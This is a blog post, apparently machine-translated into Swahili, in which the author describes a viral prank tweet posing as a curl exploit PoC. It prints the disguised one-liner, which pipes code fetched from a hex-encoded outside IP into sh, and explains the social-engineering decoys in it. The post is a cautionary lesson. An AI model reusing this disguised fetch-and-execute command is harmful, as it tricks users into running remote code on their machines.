Kumbuka. tafsiri.:
TL; DR: Usitumie uwekaji bomba wa faili kwa sh au bash kwa hali yoyote. Hii ni njia nzuri ya kupoteza udhibiti wa kompyuta yako.
Ninataka kushiriki nawe hadithi fupi kuhusu ushujaa wa PoC wa katuni ambao uliundwa tarehe 31 Mei. Alionekana mara moja akijibu habari kutoka
Baada ya kumaliza kufanyia kazi mbinu mpya ya kufichua katika curl, nilinukuu tweet ya asili na "kuvuja PoC inayofanya kazi" inayojumuisha safu moja ya msimbo ambayo inadaiwa inatumia udhaifu uliogunduliwa. Bila shaka, huu ulikuwa upuuzi kamili. Nilidhani kwamba ningefichuliwa mara moja, na kwamba bora ningepokea retweets kadhaa (oh vizuri).
Hata hivyo, sikuweza kuwazia kilichotokea baadaye. Umaarufu wa tweet yangu uliongezeka. Kwa kushangaza, kwa sasa (15:00 wakati wa Moscow Juni 1) watu wachache wamegundua kuwa hii ni bandia. Watu wengi huituma tena bila kuiangalia hata kidogo (achilia mbali kuvutiwa na michoro ya kupendeza ya ASCII inayotoa).
Angalia tu jinsi ilivyo nzuri!
Ingawa vitanzi na rangi hizi zote ni nzuri, ni wazi kwamba watu walilazimika kutumia msimbo kwenye mashine yao ili kuziona. Kwa bahati nzuri, vivinjari hufanya kazi kwa njia ile ile, na pamoja na ukweli kwamba sikutaka kabisa kuingia kwenye shida ya kisheria, nambari iliyozikwa kwenye tovuti yangu ilikuwa tu kupiga simu za mwangwi bila kujaribu kusakinisha au kutekeleza msimbo wowote wa ziada.
Upungufu mdogo:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Uhandisi wa kijamii na kielektroniki (TAZAMA) - zaidi ya hadaa
Usalama na ujuzi ulikuwa sehemu kuu ya jaribio hili. Nadhani wao ndio wamesababisha mafanikio yake. Mstari wa amri ulionyesha wazi usalama kwa kurejelea "127.0.0.1" (mwenyeji anayejulikana sana). Localhost inachukuliwa kuwa salama na data iliyomo haiachi kamwe kwenye kompyuta yako.
Ufahamu ulikuwa sehemu kuu ya pili ya TAZAMA ya jaribio. Kwa kuwa hadhira inayolengwa kimsingi ilijumuisha watu wanaofahamu misingi ya usalama wa kompyuta, ilikuwa muhimu kuunda msimbo ili sehemu zake zionekane kuwa za kawaida na zinazojulikana (na kwa hivyo ni salama). Vipengele vya kukopa vya dhana za zamani za unyonyaji na kuchanganya kwa njia isiyo ya kawaida imeonekana kuwa na mafanikio sana.
Chini ni uchambuzi wa kina wa mjengo mmoja. Kila kitu kwenye orodha hii huvaa asili ya vipodozi, na kwa kweli hakuna kitu kinachohitajika kwa uendeshaji wake halisi.
Je, ni vipengele gani vinavyohitajika kweli? Hii -gsS
, -O 0x0238f06a
, |sh
na seva ya wavuti yenyewe. Seva ya wavuti haikuwa na maagizo yoyote hasidi, lakini ilitoa tu michoro ya ASCII kwa kutumia amri echo
katika hati iliyomo ndani index.html
. Wakati mtumiaji aliingia mstari na |sh
katikati, index.html
kupakiwa na kutekelezwa. Kwa bahati nzuri, walinzi wa seva ya wavuti hawakuwa na nia mbaya.
-
../../../%00
- inawakilisha kwenda zaidi ya saraka; -
ngx_stream_module.so
- njia ya moduli ya NGINX isiyo ya kawaida; -
/bin/sh%00<'protocol:TCP'
- inadaiwa tunazindua/bin/sh
kwenye mashine inayolengwa na uelekeze tena pato kwa kituo cha TCP; -
-O 0x0238f06a#PLToffset
- kiungo cha siri, kilichoongezwa#PLToffset
, kuonekana kama kizuizi cha kumbukumbu kwa njia fulani kilichomo kwenye PLT; -
|sh;
- kipande kingine muhimu. Tulihitaji kuelekeza pato kwa sh/bash ili kutekeleza nambari inayotoka kwa seva ya wavuti inayoshambulia iliyoko.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy ambayo netcat inahusu/dev/tcp/localhost
ili kila kitu kionekane salama tena. Kwa kweli, haifanyi chochote na imejumuishwa kwenye mstari wa uzuri.
Hii inahitimisha utatuzi wa hati ya mstari mmoja na mjadala wa vipengele vya "uhandisi wa kijamii na kielektroniki" (hadaa tata).
Usanidi na Hatua za Kukabiliana na Seva ya Wavuti
Kwa kuwa idadi kubwa ya waliojiandikisha ni infosec/hackers, niliamua kuifanya seva ya wavuti kuwa sugu zaidi kwa maneno ya "maslahi" kwa upande wao, ili tu wavulana wawe na kitu cha kufanya (na itakuwa ya kufurahisha kuanzisha). Sitaorodhesha mitego yote hapa kwani majaribio bado yanaendelea, lakini hapa kuna mambo machache ambayo seva hufanya:
- Hufuatilia kikamilifu majaribio ya usambazaji kwenye mitandao fulani ya kijamii na kubadilisha vijipicha mbalimbali vya onyesho la kukagua ili kuhimiza mtumiaji kubofya kiungo.
- Huelekeza upya Chrome/Mozilla/Safari/nk kwa video ya matangazo ya Thugcrowd badala ya kuonyesha hati ya ganda.
- Saa kwa ishara dhahiri za kuingiliwa/udukuzi wa wazi, na kisha huanza kuelekeza maombi kwenye seva za NSA (ha!).
- Inasakinisha Trojan, pamoja na rootkit ya BIOS, kwenye kompyuta zote ambazo watumiaji wao hutembelea mpangishaji kutoka kwa kivinjari cha kawaida (tu utani!).
Sehemu ndogo ya antimers
Katika kesi hii, lengo langu pekee lilikuwa kujua sifa zingine za Apache - haswa, sheria nzuri za kuelekeza ombi - na nilifikiria: kwa nini sivyo?
Tumia NGINX (Halisi!)
Jiandikishe kwa
Chanzo: mapenzi.com